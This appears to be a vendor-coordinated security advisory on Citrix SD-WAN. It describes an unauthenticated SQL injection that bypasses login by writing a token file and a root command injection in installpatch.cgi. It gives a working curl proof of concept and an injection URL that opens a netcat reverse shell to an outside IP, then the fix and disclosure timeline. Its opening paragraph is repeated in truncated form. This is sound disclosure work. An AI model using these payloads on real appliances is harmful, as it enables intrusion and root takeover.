### Synopsis Multiple vulnerabilities were discovered in the Citrix SD-WAN appliance. By exploiting the vulnerabilities in combination, a remote, unauthenticated attacker can gain root access. #### Unauthenticated SQL Injection /sdwan/nitro/v1/config/get_package_file The cgi-bin/sdwanrestapi/getpackagefile.cgi Perl script contains a SQL injection vulnerability that can be exploited by a remote, unauthenticated attacker. Input validation is not applied before incorporating user input in a SQL query. By exploiting this vulnerability with a crafted HTTP request, an attacker is able to write to (and create) files in locations writable by the 'mysql' user. For instance, a file can be created in the /tmp directory. A SQL injection payload can be constructed in such a way that the attacker is able to completely bypass the authentication mechanism by writing a token file to the /tmp directory. The SQL injection vulnerability can be triggered by crafting the HTTP POST request such that: -...
### Synopsis Multiple vulnerabilities were discovered in the Citrix SD-WAN appliance. By exploiting the vulnerabilities in combination, a remote, unauthenticated attacker can gain root access. #### Unauthenticated SQL Injection /sdwan/nitro/v1/config/get_package_file The cgi-bin/sdwanrestapi/getpackagefile.cgi Perl script contains a SQL injection vulnerability that can be exploited by a remote, unauthenticated attacker. Input validation is not applied before incorporating user input in a SQL query. By exploiting this vulnerability with a crafted HTTP request, an attacker is able to write to (and create) files in locations writable by the 'mysql' user. For instance, a file can be created in the /tmp directory. A SQL injection payload can be constructed in such a way that the attacker is able to completely bypass the authentication mechanism by writing a token file to the /tmp directory. The SQL injection vulnerability can be triggered by crafting the HTTP POST request such that: - An HTTP header 'SSL_CLIENT_VERIFY' is set with the value 'SUCCESS' - '?action=file_download' - Content-type is 'application/json' - Post data is a JSON containing the SQL injection payload in the 'site_name' Below is vulnerable code. However, there are other vulnerable queries: ``` 175 if($package_type eq "active"){ 176 $query = "SELECT observed_sw_revision, appliance_name, expected_sw_revision, package_file_name from Network_Appliance_Active " . 177 "WHERE site_name ='" . $site_name_arg . "' AND " . 178 "appliance_id=" . $appliance_id_arg.";"; 179 } ``` ##### Proof of Concept In the curl command below, a token file will be created at /tmp/token_01234. ``` curl --insecure -H 'SSL_CLIENT_VERIFY: SUCCESS' -H 'Content-Type: application/json' -d '{"get_package_file": {"site_name": "blah'"' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_01234';#\""',"appliance_type": "primary","package_type": "active"}}' https://192.168.1.212/sdwan/nitro/v1/config/get_package_file?action=file_download ``` Next visit this address in a web browser. You should be logged in.: ``` https://192.168.1.212/cgi-bin/vwdash.cgi?swc-token=01234 ``` #### Authenticated Command Injection /cgi-bin/installpatch.cgi Installpatch.cgi suffers from a command injection vulnerability. This vulnerability can be exploited by a remote, authenticated attacker to execute OS commands with root privileges. Specifically, the 'installfile' parameter value is not validated prior to using it in a call to the Perl system() function. ##### Proof of Concept After having bypassed auth, visit this URL. ``` https://192.168.1.212/cgi-bin/installpatch.cgi?swc-token=01234&installfile=`sudo%20nc%20-nv%20192.168.1.191%204444%20-e%20/bin/bash` ``` ### Solution Upgrade to version 10.2.3. ### Disclosure Timeline 05/23/2019 - Tenable discloses vulnerabilities to Citrix. 90-day date is August 21, 2019. 05/24/2019 - Citrix has opened a case to investigate. 06/04/2019 - Tenable asks for an update. 06/04/2019 - Citrix confirms the bugs. They intend to patch before 90-day date. 06/05/2019 - Tenable thanks Citrix for the update. 06/11/2019 - Tenable notices 10.2.3 was just released. Asks Citrix if these bugs were fixed because we can't download the new version successfully. 06/12/2019 - Response from Citrix: "Citrix will publish which versions have relevant fixes when we publish our Security Bulletin with respect to your findings and these issues." Citrix also reconfirms disclosure date. 06/18/2019 - Tenable asks for an update. 06/18/2019 - Citrix says they are on schedule to release a patch by the 90-day date. 06/18/2019 - Tenable thanks Citrix. We will continue to follow up periodically. 06/26/2019 - Citrix advises that they are planning to release a public bulletin within the next two weeks. They hope to have a more specific date in the next few days. Asks Tenable how to give credit. 06/27/2019 - Tenable acknowledges. Asks to be updated when a more specific date is decided on. Credit looks good. Asks about CVE identifiers and the patched version number. 07/02/2019 - Tenable asks for an update. 07/02/2019 - Tenable notices that version 10.2.3 patches all issues. Advisory released.
